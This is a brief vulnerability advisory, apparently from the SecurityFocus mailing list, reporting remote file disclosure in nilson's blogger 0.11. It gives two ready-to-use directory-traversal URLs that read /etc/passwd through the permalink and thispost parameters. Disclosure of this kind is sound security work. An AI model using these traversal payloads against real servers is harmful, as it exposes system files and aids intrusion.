nilson's blogger 0.11 remote file disclosure vulnerabilities Jan 31 2008 07:56PM
muuratsalo experimental hack lab (muuratsalo gmail com)
nilson's blogger 0.11 remote file disclosure vulnerabilities

download http://sourceforge.net/projects/nilson-blogger/

author muuratsalo
contact muuratsalo[at]gmail.com

exploits
http://localhost/nilson-blogger0.11/index.php?permalink=../../../../../.
./../../../../etc/passwd
http://localhost/nilson-blogger0.11/comments.php?thispost=../../../../..
/../../../../../etc/passwd

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus